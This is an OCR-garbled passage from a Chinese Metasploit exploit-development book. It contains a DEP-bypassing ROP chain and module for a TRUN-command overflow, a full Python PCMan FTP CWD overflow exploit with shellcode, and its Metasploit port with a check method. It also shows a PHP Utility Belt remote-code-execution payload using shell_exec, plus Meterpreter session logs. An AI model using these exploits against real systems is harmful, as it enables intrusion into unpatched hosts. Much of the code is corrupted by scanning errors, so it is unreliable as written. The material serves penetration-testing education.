Ox77dfb7e4, # POP ECX # RETN [RPCRT4.dl11] 

0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll] 

0x76a5fd52, # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN 
[MSCTF.d11] 

0x766a7087, # POP EBP # RETN [USP10.d11] 

0x625011bb, # & jmp esp [essfunc.dl1l] 

O3CIKERSST6; # POP EAX # RETN [msvcrt.dll] 

Oxfffffdff, # Value to negate, will become 0x00000201 

0x765e4802, # NEG EAX # RETN [user32.dl1l] 

0x76a5f9f1, # XCHG EAX,EBX 4 RETN [MSCTF.d11] 

0x7779f5d4, # POP EAX # RETN [msvcrt.dl11] 
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OxffffffcO, # Value to negate, will become 0x00000040 
0x765e4802, # NEG EAX 4 RETN [user32.d11] 
0x76386fcO0, d XCHG EAX,EDX # RETN [kernel32.dll] 
Ox77dfd09c, 4 POP ECX # RETN [RPCRT4.dl11] 
0x62504dfc, # &Writable location [essfunc.dll] 
0x77e461e1, 4 POP EDI # RETN [RPCRT4.dl11] 
0x765e4804, # RETN (ROP NOP) [user32.d11] 
0x777£3836, # POP EAX # RETN [msvcrt.d11] 
0x90909090, # nop 

# 





0x77843c64, PUSHAD # RETN [ntdll.dll 
].flatten.pack("V*") 





return rop. gadgets 


end 

def exploit 
connect 
rop chain - create rop chain() 
junk - rand text alpha, upper(target['Offset']) 
buf = "TRUN ."«junk + rop chain + make nops(16) + payload.encoded-«'rn' 
Sock.put (buf) 
handler 
disconnect 

end 

end 


我 们 从 rop. chains.txt 文件 中 将 Mona 脚本 产生 的 create rop chain KA dil S AREP 
这 有 段 渗透 代码 先 连接 到 目标 ， 之 后 调用 create rop chain 函数 ， 并 将 完整 的 ROP 链 保存 到 


rop chain 变量 中 。 


接 下 来 ,我 们 使 用 rand_text_alpha_upper 图 数 创建 了 一 个 包含 了 2006 个 随机 字符 的 字符 串 ， 
并 将 其 保存 在 一 个 名 为 junk 的 变量 中 。 这 个 应 用 程序 的 漏洞 依赖 于 TRUN 命令 因此 ， 创 建 
一 个 名 为 puf 的 新 变量 ， 并 将 命令 TRUN 与 包含 了 2006 个 随机 字符 的 junk 变量 和 rop. chain 保存 
在 这 个 变量 中 。 最 后 ， 再 将 一 些 填 充 数据 和 ShellCode 添加 到 buf 变量 中 。 


接 下 来 ， 将 这 个 buf 变量 放 入 通信 渠道 sock.put 方法 中 。 最 后 ， 调 用 handler 来 检查 这 次 渗透 
是 否 成 功 。 
运行 这 个 模块 ， 检 查 能 否 成 功 渗透 该 系统 。 


Imsf exploit(rop-example) > set RHOST 192.168.116.141 

RHOST => 192.168.116.141 

Imsf exploit(rop-example) > set payload windows/meterpreter/bind tcp 
payload => windows/meterpreter/bind tcp 

Imsf exploit(rop-example) > set RPORT 9999 

RPORT => 9999 

Imsf exploit(rop-example) > exploit 











i 





H 





























s 








[*] Started bind handler 

[*] Sending stage (179267 bytes) to 192.168.116.141 

[*] Meterpreter session 2 opened (192.168.116.142:46409 -» 192.168.116.141:4444) 
at 2018-03-04 21:58:42 40530 


meterpreter > J 


干 得 漂亮 ! 我 们 已 经 解决 了 DEP 保护 机 制 ， 现 在 就 可 以 对 已 渗透 系统 进行 后 渗透 工作 了 。 
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3.5 其 他 保护 机 制 


在 本 章 中 , 我 们 开发 了 基于 栈 漏洞 的 渗透 模块 。 在 开发 过 程 中 , 还 绕 过 了 SEH 和 DEP 保护 机 制 。 
目前 常见 的 保护 技术 还 有 地 址 空间 布局 随机 化 ( Address Space Layout Randomization, ASLR ), 4X 
cookies 、SafeSEH、SEHOP 以 及 各 种 其 他 技术 , 我 们 将 在 本 书后 续 内 容 中 看 到 绕 过 这 些 保护 机 制 的 
方法 。 不 过 要 理解 这 些 方法 ， 需 要 在 汇编 、 操 作 码 和 调试 方面 有 很 良好 的 基础 。 
























































这 是 一 个 优秀 的 保护 机 制 绕 过 教程 : https:/www.corelan.be/index.Php/2009/09/21/ 
&5 exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ o 


如 果 想 获取 关于 调试 的 更 多 信息 , 请 访问 : http///resources.infosecinstitute.com/debugging- 


fondamentals-for-exploit-development/。 
3.6 小结 与 练习 


在 这 一 章 中 ， 我 们 介绍 了 在 Metasploit 中 编写 渗透 模块 的 汇编 基础 、 一 般 概念 以 及 它们 在 渗透 中 
的 重要 性 。 本 章 深入 研究 了 基于 栈 的 溢出 漏洞 、 基 于 SEH 的 栈 溢出 以 及 如 何 绕 过 DEP 之 类 的 保护 机 
制 。 我 们 还 学 习 了 各 种 在 Metasploit 中 用 来 辅助 渗透 开发 的 工具 。 此 外 还 介绍 了 坏 字符 和 空间 限制 的 
重要 性 。 

现在 ， 我 们 已 经 可 以 完成 很 多 任务 了 ， 例 如 在 辅助 工具 的 帮助 下 使 用 Metasploit 来 编写 软件 渗透 
程序 ， 使 用 调试 器 来 检查 重要 寄存 器 中 的 内 容 ， 改 写 寄存 器 中 的 内 容 ， 并 且 战 胜 了 复杂 的 保护 机 制 。 


在 开始 下 一 章 的 学 习 之 前 ， 你 可 以 自行 安排 下 列 练习 。 


口 尝试 在 exploit-db.com 网 站 上 查找 只 能 在 Windows XP 系统 上 运行 的 渗透 模块 ， 对 它们 进行 改 
造 ， 使 得 它们 可 以 运行 在 Windows 7/8/8.1 操作 系统 上 。 

O 在 https://exploit-db.com/ 上 找到 至 少 3 个 POC 模块 ,并 将 它们 转换 成 Metasploit 中 可 用 的 渗透 
模块 。 

口 为 Metasploit 的 GitHub 代码 库 做 出 自己 的 贡献 。 


下 一 章 将 会 着 眼 于 那些 Metasploit 框架 中 不 包括 的 但 已 经 公开 而 且 有 效 的 模块 。 我 们 将 把 它们 移 
植 到 Metasploit 框架 中 。 
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上 一 章 学 习 了 如 何在 Metasploit 中 编写 渗透 模块 。 不 过 ， 如 果 某 个 程序 已 经 有 相应 的 渗透 模块 ， 
就 没有 必要 重新 编写 一 个 了 。 这 些 已 经 公开 的 可 用 模块 可 能 是 用 不 同 语言 编写 的 , 例如 Perl, Python, 
C 等 。 下 面 开始 学 习 如 何 将 用 不 同 语言 编写 的 模块 移植 到 Metasploit 框架 中 。 通 过 这 种 机 制 ， 可 以 将 
各 种 现存 的 模块 软件 移植 成 为 与 Metasploit 兼容 的 渗透 模块 ， 从 而 达到 节省 时 间 、 实 现 攻击 载荷 动态 
切换 的 效果 。 

本 章 将 着 眼 于 以 下 几 个 要 点 。 
口 将 使 用 不 同 语言 编写 的 模块 移植 到 Metasploit 中 。 
口 从 独立 的 渗透 模块 中 发 掘 出 功能 实现 的 要 点 。 
口 通过 现 有 的 扫描 或 者 工具 脚本 来 创建 Metasploit 模块 。 

如 果 搞 清楚 了 现 有 模块 中 的 函数 都 执行 了 什么 任务 ， 那 么 将 该 模块 移植 到 Metasploit 框架 中 也 就 
不 是 一 件 困 难 的 事情 了 。 

只 对 一 台 主 机 进行 渗透 测试 时 , 将 一 个 独立 的 模块 移植 到 Metasploit 并 不 能 节省 渗透 攻击 的 时 间 。 
在 对 大 规模 的 网 络 进行 渗透 测试 的 时 候 才能 体现 出 模块 移植 的 优势 。 另 外 ， 由 于 移植 后 的 每 一 个 渗透 
模块 都 属于 Metasploit， 这 使 得 渗透 测试 更 加 具有 组 织 性 。 接 下 来 将 学 习 如 何 实现 Metasploit 的 可 移 
植 性 。 


4.1 导入 一 个 基于 栈 的 缓冲 区 溢出 渗透 模块 
在 接 下 来 的 示例 中 ,我们 将 看 到 如 何 将 一 个 用 Python 编写 的 渗透 模块 导入 到 Metasploit 中 。 你 可 
以 从 https://www.exploit-db.com/exploits/31255/ 下 载 这 个 渗透 模块 。 下 面 来 分 析 这 个 模块 的 代码 。 


import socket as s 
from sys import argv 










































































































































































host - "127.0.0.1" 
fuser - "anonymous" 
fpass - "anonymous" 


junk = '\x41' * 2008 





122 第 4 章 渗透 模块 的 移植 





espaddress = 'Nx72Nx93NxabNx71' 
nops - 'x90' * 10 
shellcode- ("\xba\xlc\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xbl1" 
"\x33\x31\x53\x12\x83\xeb\xfc\x03\x4f\xba\x47\x59\x93\x2a\x0e" 
"\xa2\x6b\xab\x71\x2a\x8e\x9a\xa3\x48\xdb\x8f\x73\xla\x89\x23" 
"\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xbl\x61\x81\x8d\x7d\x2d" 
"\x41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\xlc\x03\x22\xd5" 
"\x6b\xb6 \xd3 \x52\x29\x0b\xd5\xb4\x26\x33\xad\xb1\xf8\xc0\x07" 
"\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xel\xd7\x9f\x18\xa8\x5c" 
"\x6b\xea\x2b\xb5\xa5\x13\xla\xf9\x6a\x2a\x93\xf4\x73\x6a\x13" 
"\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46\xbb\x03\x0f\xa3" 
"\x3a\xc7\xd6\x20\x30\xac\x9d\x6f\x54\x33\x71\x04\x60\xb8\x74" 
"\xcb\xel\xfa\x52\xcf\xaa\x59\xfa\x56\x16\x0f\x03\x88\xfe\xf0" 
"\xal\xc2\xec\xe5\xd0\x88\x7a\xfb\x51\xb7\xc3\xfb\x69\xb8\x63" 
"\x94\x58\x33\xec\xe3\x64\x96\x49\x1lb\x2f\xbb\xfb\xb4\xf6\x29" 
"\xbe\xd8\x08\x84\xfc\xe4\x8a\x2d\x7c\x13\x92\x47\x79\x5f\x14" 
"\xbb\xf3\xf0\xf1\xbb\xa0\xf1l\xd3\xdf\x27\x62\xbf\x31\xc2\x02" 
"\x5a\x4e") 


sploit = junk+espaddress+nops+shellcode 
conn = S.Socket(s.AF INET,s.SOCK STREAM) 
conn.connect ( (host ,21)) 

conn.send('USER '+fuser+'\r\n') 

uf - conn.recv(1024) 

conn.send('PASS '+fpass+'\r\n') 

pf - conn.recv(1024) 

conn.send('CWD '+sploit+'\r\n') 

cf - conn.recv(1024) 

conn.close() 


这 个 渗透 模块 采用 匿名 方式 登录 到 运行 在 21 端口 上 的 PCMAN FTP 2.0， 并 利用 cw 命令 来 渗透 
这 个 软件 。 
整个 渗透 过 程 可 以 分 解 为 如 下 几 点 。 


(1) 将 用 户 名 、 密 码 和 主机 分 别 保存 到 变量 fuser, pass 和 host 中 。 
(2) 为 变量 junk 赋值 为 2008 个 字符 和 A。 这 里 EIP 的 偏 移 量 为 2008。 
(3) 将 JMP ESP 的 地 址 赋值 给 变量 espaqdaress ,目标 返回 地 址 为 espaddress 的 值 0x71ab9372。 
(4) 将 10 个 NOP 保存 到 变量 nops 中 。 
(5) 将 用 来 启动 计算 器 的 攻击 载荷 保存 到 变量 shellcode 中 。 
(6) 将 junk, espaddress, nops 以 及 shellcode 连接 起 来 并 保存 到 变量 sploit Po 

(7) 使 用 语句 s. socket (s.AF_INET, s.SOCK_STREAM) 建立 一 个 套 接 字 连 接 , 然 后 使 用 connect 
( (host,21) ) 连 接 到 目标 的 21 端口 。 

(8) 使 用 USER 命令 加 变量 fuser, Pass 命令 加 变量 fpass 成 功 登 录 到 目标 ftp Eo 

(9) 向 目标 发 送 cwD 命令 , 并 在 后 面 加 上 变量 sploit。 这 将 改写 在 偏 移 量 为 2008 处 的 EIP 中 的 
内 容 ， 并 弹出 一 个 计算 器 应 用 程序 。 

(10) 执行 该 渗透 模块 并 分 析 结 果 ， 过 程 如 下 。 
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um yer TREE 


oof) OOW DOH) icrosoft Windows XP [Version 5.1.2600] 
CC) Copyright 1985-2001 Microsoft Corp. 


PA E 
> X] EÀ X E] C:\Documents and Settings\Administrator>cd Desktop 


IP?? ?7 ?7 ???? C:\Documents and SettingsMfdministratorNDesktop?PCMAN-CUD. py 



































zi 











硬 编码 值 修改 了 这 个 参数 赋值 的 机 制 。 
渗透 模块 执行 之 后 ， 将 会 弹出 如 下 内 容 。 


€ 原来 的 渗透 模块 需要 从 命令 行 处 接收 用 户 名 、 密 码 和 主机 等 值 ， 不 过 我 们 使 用 固定 的 








* Command Prompt 


icrosoft Windows XP [Version 5.1.26081 
«C^» Copyright 1985-2081 Microsoft Corp. 


*NDocuments and Settings*Mfidministrator?cd Desktop 





:NDocuments and Settings*Mfldministrator*Desktop»PCMAN-CUD.py 
raceback most recent call last): 


File "C:\Documents and Settingsw*fidministrator*DesktopNPCMAN-CUD. pv", 
| 
= conn.recu(18245 











ocket.error: [Errno 1880541 fin existing connection vas forcibly closed 
D] EJ EJ EE] | peis 
[m] | 4 5 Ji 6 Ji " I x ] :\Documents and Settings\fAdministrator\Desktop> 
MS 1 2 3 - 1x 
EN ES 4-1 -J 




















可 以 看 到 ， 弹 出 了 一 个 计算 器 应 用 程序 ， 这 表明 了 渗透 模块 成 功 地 完成 了 任务 。 


4.4.1 收集 关键 信息 


现在 来 从 这 个 渗透 模块 中 找 出 一 些 重要 的 值 ， 这 些 值 是 我 们 在 创建 相同 功能 的 Metasploit 模块 时 
所 必需 的 ， 下 表 列 出 了 这 些 值 。 


序 号 变 量 值 
1 偏 移 量 2008 
2 目标 返回 / 跳 转 地 址 /使 用 JMP ESP 在 可 执行 ”0x71AB9372 
模块 中 找到 值 















































3 目标 端口 21 
4 ShellCode 用 来 消除 不 确定 区 域 的 NOP 字 节 10 
5 思 后 面 跟着 2008 个 字 节 的 填充 数据 以 及 变量 espaddress,NOP 


和 shellcode fs CWD 命令 
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我 们 现在 已 经 获得 了 构建 Metasploit 模块 所 需 的 全 部 信息 。 在 下 一 他 中 ,我 们 将 会 看 到 使 用 


Metasploit 构建 一 个 渗透 模块 是 多 么 轻松 的 一 件 事 ! 








pun 





4.1.2 ”构建 Metasploit 模块 


复制 一 个 相同 功能 的 模块 再 对 其 进行 改造 是 开始 构建 一 个 Metasploit 模块 的 最 简单 方法 。 不 过 
Mona.py 脚本 也 可 以 动态 生成 一 个 Metasploit 适用 的 模块 ， 后 续 章节 将 会 讲述 如 何 使 用 Mona.py 脚本 
来 快速 生成 一 个 渗透 模块 。 

现在 来 看 一 个 功能 相同 的 Metasploit 模块 代码 : 


class MetasploitModule < Msf::Exploit::Remote 



































Rank - NormalRanking 


include Msf::Exploit::Remote::Ftp 


def initialize(info = () 
super(update info(info, 
'Name' -» 'PCMAN FTP Server Post-Exploitation CWD Command', 
'Description' => %q{ 


This module exploits a buffer overflow vulnerability in PCMAN FTP 
J 
'Author' => 
[ 
'Nipun Jaswal' 
I; 
'DefaultOptions' => 
( 
'EXITFUNC' => 'process', 


'VERBOSE' => true 
Ps 
'Payload' E 
{ 
'Space' -» 1000, 


'BadChars' => "\x00\xff\x0a\x0d\x20\x40", 
}, 
'Platform' -» 'win', 
'Targets' =S 
[ 
[ 'Windows XP SP2 English', 
{ 
'Ret' => 0x71ab9372, 
'Offset' => 2008 
j 
Ji; 
Jiz 
'DisclosureDate' => 'May 9 2016', 
'DefaultTarget' => 0)) 
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register options( 
[ 
Opt: :RPORT (21), 
OptString.new('FTPPASS', [true, 'FTP Password', 'anonymous']) 
1) 
End 


我 们 在 前 面 几 章 已 经 研究 过 很 多 渗透 模块 ， 现 在 这 个 渗透 模块 也 没什么 特殊 之 处 。 我 们 还 是 先 引 
和 人 了 所 有 必需 的 库 文 件 和 /lib/msf/core/exploit 目录 下 的 ftp.rb 库 文件 ， 再 在 初始 化 部 分 定义 了 所 有 必需 
的 信息 。 根 据 从 渗透 模块 中 收集 到 的 关键 信息 ,我 们 将 Rec 的 值 设置 为 返回 地 址 的 值 , 将 offset 的 
值 设 置 为 2008， 另 外 还 将 FTPPASS 选项 设置 为 'anonymous'。 接 着 来 看 下 面 的 代码 : 


def exploit 
C = connect login 

















return unless c 
sploit = rand text alpha(target['Offset']) 
sploit «« [target.ret].pack('V') 
sploit «« make nops(10) 
sploit «« payload.encoded 
send cmd( ["CWD " + sploit, false] ) 
disconnect 
end 
end 


使 用 connect 1ogin 方法 连接 到 目标 ， 然 后 使 用 我 们 提供 的 用 户 名 和 密码 尝试 登录 。 等 一 下 ! 
我 们 什么 时 候 提供 过 登录 的 用 户 名 和 密码 了 ?在 导入 ftp 库 之 后 ， 这 个 模块 中 的 FTPUSER 和 rrPPASS 
选项 就 可 以 自动 完成 这 项 工作 。FTPUSER JS HJ anonymous 6 不 过 ,我 们 已 经 在 register_options 
中 将 FTPPASS 的 值 设置 成 anonymous 了 。 


接 下 来 ， 使 用 rana text alpha 函数 生成 2008 个 (该 值 由 Targets 中 的 变量 offset 决定 ) 
填充 数据 ， 并 将 它们 都 保存 到 变量 sploit 中 ; 使 用 pack('V') 函数 将 Targets 中 Rec 的 值 以 小 端 
格式 保存 到 sploit 变量 中 ;再 将 make_nop 函数 产生 的 NOP 和 ShellCode 添加 到 sploit 变量 之 后 ， 
输出 数据 就 准备 好 了 。 

再 下 一 步 ， 使 用 ftp 库 中 的 sena cma 函数 将 一 个 包含 了 变量 sploit 中 数据 的 cw 命令 发 送 到 
目标 。 但 是 如 果 使 用 Metasploit 又 有 哪些 区 别 呢 ? 下 面 就 来 看 看 Metasploit 能 做 到 什么 。 


口 无 须 手动 生成 填充 数据 ， 这 一 工作 可 以 由 rand text. alpha 困 数 完成 。 

口 无 须 将 Rec 地 址 转换 为 小 端 格式 ， 这 一 工作 可 以 由 函数 pack('V') 实现 。 

a 无 须 手 动 生成 NOP， 这 一 工作 可 以 由 make_nops 完成 。 

O 无 须 提供 任何 硬 编码 的 ShellCode， 因 为 可 以 在 模块 运行 时 再 决定 或 者 改变 攻击 载荷 。 这 样 在 
需要 改变 ShellCode 时 就 无 须 重新 编码 ， 从 而 节省 了 大 量 时 间 。 

口 轻松 地 使 用 ftp 库 完 成 了 套 接 字 的 创建 和 连接 操作 。 

口 最 为 重要 的 是 , 再 也 不 需要 手动 输入 命令 来 连接 和 登录 , 因为 Metasploit 的 方法 connect. 1ogin 
完成 了 这 项 工作 。 
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4.1.3. fi& FH Metasploit 完成 对 目标 应 用 程序 的 渗透 








我 们 已 经 见识 到 了 使 用 Metasploit 改造 现 有 渗透 模块 的 便利 怕 
































标 应 用 程序 ， 并 对 结果 进行 分 析 。 




















msf > use exploit/windows/masteringmetasploit/pcman cwd 
msf exploit(pcman cwd) > set RHOST 192.168.10.108 


RHOST -» 192.168.10.108 


msf exploit(pcman cwd) » show options 


I 
Module options (exploit/windows/masteringmetasploit/pcman cwd): 


The username to authenticate as 


Name Current Setting Required Description 
FTPPASS anonymous yes FTP Password 
FTPUSER anonymous no 

RHOST 192.168.10.108 yes The target address 
RPORT 21 yes The target port 


Exploit target: 


Id Name 


0 Windows XP SP2 English 











E， 接 下 来 就 使 用 这 个 模块 来 渗透 目 


[ 


FTPPASS 和 FTPUSER 的 值 都 已 经 被 设置 成 为 了 anonymous。 接 下 来 设置 RHOST 的 值 和 攻击 载 
荷 的 类 型 ， 并 开始 对 目标 计算 机 进行 渗透 攻击 。 过 程 如 下 图 所 示 。 

















msf exploit(pcman cwd) > set payload windows/meterpreter/bind tcp 


payload => windows/meterpreter/bind tcp 


msf exploit(pcman cwd) » exploit 
*] Started bind handler 
] 
| Connected to target FTP server. 


Sending password... 


Connecting to FTP server 192.168.10.108:21... 


] Authenticating as anonymous with password anonymous... 


[*] 
[*] Sending stage (957487 bytes) to 192.168.10.108 


meterpreter » 














我 们 的 渗透 模块 成 功 完成 了 任务 。Metasploit 还 提供 了 一 些 额 外 的 功能 ， 可 以 使 渗透 过 程 更 加 智 


能 化 ， 下 一 节 将 介绍 这 些 功 能 。 


4.1.4 在 Metasploit 的 渗透 模块 中 实现 一 个 检查 方法 


在 对 目标 应 用 程序 进行 渗透 之 前 ，Metasploit 可 能 需要 检查 这 个 程序 的 版 本 。 这 一 点 十 分 重要 ， 
能 引起 目标 程序 


为 如 果 运 行 在 目标 计算 机 上 的 应 用 程序 是 一 个 没有 漏洞 的 版 本 , 那么 渗透 过 程 就 可 
的 崩溃 ， 我 们 的 渗透 也 就 成 了 泡影 。 现 在 来 编写 一 段 检查 目标 应 用 程序 的 代码 〈 在 上 


经 成 功 完成 了 对 这 个 程序 的 渗透 ): 
def check 


C - connect login 
disconnect 





p 











1， 我 们 已 





RH 
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if c and banner =~ /220 PCMan's FTP Server 2\.0/ 
vprint status("Able to authenticate, and banner shows the vulnerable 
version") 
return Exploit::CheckCode::Appears 
elsif not c and banner =~ /220 PCMan's FTP Server 2\.0/ 
vprint_status ("Unable to authenticate, but banner shows the 
vulnerable version") 
return Exploit::CheckCode::Appears 
end 
return Exploit::CheckCode::Safe 
end 


check 方法 是 以 调用 connect. 1ogin PRAIUT GU, connect login 函数 可 以 用 来 初始 化 一 个 
到 目标 的 连接 。 如 果 连 接 成 功 ， 应 用 程序 就 可 以 返回 一 个 banner, 使 用 正则 表达 式 将 这 个 banner 与 漏 
洞 程序 的 banner 进行 比较 ， 如 果 成 功 连接 并 且 banner 匹配 的 话 ， 就 可 以 使 用 Exploit: :Checkcode 
: :Appears 将 这 个 应 用 程序 标记 为 存在 漏洞 ; 如 果 连 接 不 成 功 但 是 banner 匹配 ， 则 表明 这 个 应 用 程 
序 也 是 存在 漏洞 的 , 仍然 将 这 个 应 用 程序 标记 为 Bxploit: :Checkcode: :Appears， 表 示 存 在 漏洞 ; 
如 果 所 有 的 检查 都 不 成 功 , 那么 返回 一 个 Exploit::CheckCode: :Safe 值 来 表明 这 个 应 用 程序 是 不 
存在 漏洞 的 。 


现在 输入 check 命令 看 看 这 个 应 用 程序 是 否 存在 漏洞 。 











































































































msf exploit(pcman cwd) > check 


Connecting to FTP server 192.168.10.108:21... 

Connected to target FTP server. 

Authenticating as anonymous with password anonymous... 

[*] Sending password... 

*] Able to authenticate, and banner shows the vulnerable version 
192.168.10.108:21 - The target appears to be vulnerable. 


[* 
[* 








[* 


这 个 应 用 程序 是 存在 漏洞 的 ， 我 们 可 以 继续 渗透 。 




















如 果 想 获取 关于 实现 check 方 法 的 更 多 细节 ,请 访问 https://github.com/rapid7/metasploit- 
framework/wiki/How-to-write-a-check962896529-method.; 


4.2 将 基于 Web 的 RCE $A Metasploit 


本 节 将 重点 讲解 如 何 将 Web 应 用 程序 渗透 模块 导入 到 Metasploit 中 。 本 章 将 着 眼 于 一 些 重 要 函数 ， 
并 学 习 利用 这 些 函 数 来 实现 那些 通过 其 他 编程 语言 实现 的 功能 , 在 这 个 示例 中 , 我 们 将 着 眼 于 PHP utility 
belt 远程 代码 执行 漏洞 ， 这 个 漏洞 发 现 于 2015 年 12 月 8 日 。 你 可 以 从 以 下 网 址 下 载 这 个 存在 漏洞 的 应 
用 程序 : https//www.exploit-db.com/apps/222c6e2ed4c86164616e43d1947a1f-php-utility-belt-master.zip « 


这 个 远程 代码 执行 漏洞 通过 一 个 FosT 请 求 的 代码 参数 触发 ， 服 务 器 在 接收 到 这 段 精 心 构造 的 数据 请 
求 并 对 其 进行 处 理 之 时 就 会 执行 服务 器 端 代 码 。 现 在 来 看 看 如 何 对 这 个 漏洞 进行 手动 渗透 。 
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Utility Belt Home Passwords Regular Expressions Date & Time Printf 


PHP goes here 





| Run | 
上 图 中 使 用 的 命令 是 fwrite， 这 条 命令 是 用 来 向 文件 写 数据 的 。 使 用 fwrite 以 可 写 模式 打开 
名 为 info.php 的 文件 ， 然 后 将 <?php $a= "net user"; echo shell_exec($a);?> 写 人 到 文件 中 。 


命令 执行 之 后 ,将 会 创建 一 个 名 为 info.php 的 新 文件 ， 并 将 PHP 中 的 信息 写 入 到 这 个 文件 中 。 接 
下 来 ， 只 需 浏 览 info.php 文件 ， 就 可 以 看 到 执行 命令 的 结果 。 


在 浏览 器 中 打开 info.php， 如 下 所 示 。 




































































localhost 





User accounts for NIDESKTOP-PESQ2IS - 
Administrator Apex DefaultAccount Guest 





可 以 看 到 ， 在 info.php 页 面 中 列 出 了 所 有 的 用 户 名 。 为 了 编写 一 个 可 以 渗透 PHP utility belt 远程 
代码 执行 漏洞 的 Metasploit 模块 ,需要 构造 到 这 个 页 面 的 GET/POST 请 求 ， 这 样 才能 将 我 们 构造 的 恶 
意 数 据 发 送 到 存在 漏洞 的 服务 器 上 ， 从 而 获得 目标 的 Meterpreter 权限 。 


4.2.1 收集 关键 信息 


在 用 Metasploit 开发 基于 Web 的 渗透 程序 时 , 最 重要 的 就 是 要 弄 清 楚 相 关 的 Web 函数 、 使 用 这 些 
函数 的 方法 以 及 这 些 函 数 的 参数 。 还 有 一 点 也 十 分 重要 ， 就 是 要 知道 漏洞 的 确切 位 置 一 一 该 示例 中 的 
漏洞 所 在 位 置 是 CODE 参数 处 。 



































4.2.2 ”掌握 重要 的 Web 函数 


Web 应 用 程序 使 用 的 重要 函数 都 可 以 在 /lib/msf/core/exploits/http 下 的 client.rb 库 文件 中 找到 。 另 
外 ,在 /lib/rex/proto/http 下 的 client.rb 文件 和 client-request.rb 文件 包含 着 关于 CET 和 POsT 请 求 的 核心 
变量 和 方法 。 
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库 文件 /lib/msf/core/exploit/http/client.rb 中 的 以 下 方法 可 以 用 来 创建 HTTP 请 求 。 





# Passes +opts+ through directly to Rex::Proto::Http::Clientirequest raw. 
# 
def send request rawl(opts={}, timeout = 20) 
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 
actual timeout = datastore['HttpClientTimeout'] 


actual timeout =  opts[:timeout] || timeout 


end 


y l 
c = connect (opts) 
r = c.request raw(opts) 
c.send recv(r, actual timeout) 
e ::Errno::EPIPE, ::Timeout::Error 








M 


Connects to the server, creates a request, sends the request, 
reads the response 


Passes +opts+ through directly to Rex::Proto::Http::Client#request cgi. 


3 4 cHE CHE H 


def send request cgi(opts-(), timeout = 20) 
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 
actual timeout = datastore['HttpClientTimeout'] 


actual timeout =  opts[:timeout] || timeout 


connect (opts) 

c.request cgi(opts) 

.send recv(r, actual timeout) 

1 : :Errno: :EPIPE, ::Timeout::Error 














当 我 们 发 送 一 个 基于 HTTP 的 请 求 时 ，senq_reduest_raw 和 send_request_cgi 方法 是 相似 
的 ， 但 是 应 用 于 不 同 的 情况 。 


send request cgi 与 使 用 传统 的 send request raw 相 比 ， 灵 活性 更 佳 。 而 在 另外 一 些 情 况 
F, send request. raw 使 得 连接 更 简单 ， 接 下 来 我 们 将 学 习 它 们 。 

如 果 想 知道 都 需要 将 哪些 值 传递 给 这 些 函 数 ， 就 需要 对 REX 中 的 库 文 件 进行 研究 。REX 库 文件 
提供 了 与 请 求 类 型 相关 的 下 列 头 文件 ， 如 下 图 所 示 。 
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# 
# Regular HTTP stuff 
# 
'agent ' => DefaultUserAgent, 
'cgi' z» true, 
'cookie' z» nil, 
'data' Ll tri 
'headers' z» nil, 
'raw headers' me '', 
'method' z» 'GET', 
'path info' m» '', 
'port' => 80, 
'proto' z» 'HTTP', 
'query' z» Ut. 
'ssl' => falfe, 
'uri' => 'J*. 
'vars get' => {}, 
'vars_post' => {}, 
'version' => '1.1', 
'vhost' z» nil, 


在 这 里 可 以 看 至 
设 定 自己 指定 的 coo 














I， 我 们 能 够 通过 前 面 的 参数 来 向 我 们 的 请 求 传递 大 量 的 参数 值 ， 比 如 说 你 可 以 
kie 以 及 各 种 其 他 事情 。 这 里 我 们 力求 将 问题 简单 化 ， 所 以 把 精力 都 放 在 uri 参 








数 上 ， 这 个 参数 是 进行 渗透 目标 网 页 文件 的 路 径 。 
我 们 使 用 参数 method 来 指明 这 是 一 个 GET， 还 是 一 个 PosT 类 型 的 请 求 ， 这 在 获取 目标 数据 或 
者 向 目标 传递 数据 时 可 以 使 用 。 





BH 


























4.23 ”GET/POST 方法 的 使 用 要 点 




















GET 方法 用 于 在 浏览 网 页 时 向 指定 资源 发 送 对 数据 或 者 页 面 内 容 的 请 求 ， 而 PosT 方 传递 页 面 表 

















格 中 的 数据 以 进行 进一步 的 处 理 。 现 在 , 有 了 HTTP FE, 在 编写 基于 Web 的 渗透 模块 时 就 得 心 应 手 多 








了 。 使 用 PosT 类 型 


的 请 求 使 得 向 指定 网 页 发 布 查询 或 者 数据 变 得 十 分 容易 。 


现在 来 看 看 在 这 个 渗透 模块 中 需要 执行 哪些 操作 。 


(1) 创建 一 个 PO 


ST 请 求 。 





(2) 利用 coDE 参数 将 攻击 载荷 发 送 到 有 漏洞 的 应 用 程序 中 。 

(3) 获得 到 达 目 标的 Meterpreter 权限 。 

(4) 完成 一 些 后 渗透 功能 。 

现在 我 们 已 经 对 需要 完成 的 任务 有 了 足够 的 了 解 ， 接 下 来 将 编写 一 个 实现 上 述 功 能 的 渗透 模块 ， 























并 确认 它 可 正常 运行 。 


4.2.4 将 HTTP 渗透 模块 导入 到 Metasploit 中 


接 下 来 在 Metas 
如 下 。 





ploit 中 编写 一 个 针对 PHP utility belt 远程 代码 执行 漏洞 的 渗透 模块 ， 其 中 的 代码 
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class MetasploitModule < Msf::Exploit::Remote 
include Msf::Exploit::Remote::HttpClient 


def initialize(info - () 
super (update info(info, 
'Name' => 'PHP Utility Belt Remote Code Execution', 
'Description' => $qí( 
This module exploits a remote code execution vulnerability in PHP 
Utility Belt 
} 
'Author' I» 
[ 
'Nipun Jaswal', 


Iy 
'DisclosureDate' => 'May 16 2015', 





'Platform' -» 'php', 
'Payload' I» 
( 
'Space' -» 2000, 


'DisableNops' -» true 
) 
'Targets' => 
[ 
['PHP Utility Belt', {}] 


15 
'DefaultTarget' => 0 


) ) 


register options( 


[ 
OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', 


'/php-utility-belt/ajax.php']), 
OptString.new('CHECKURI',[false,'Checking Purpose','/php-utility- 
belt/info.php']), 
1) 
end 


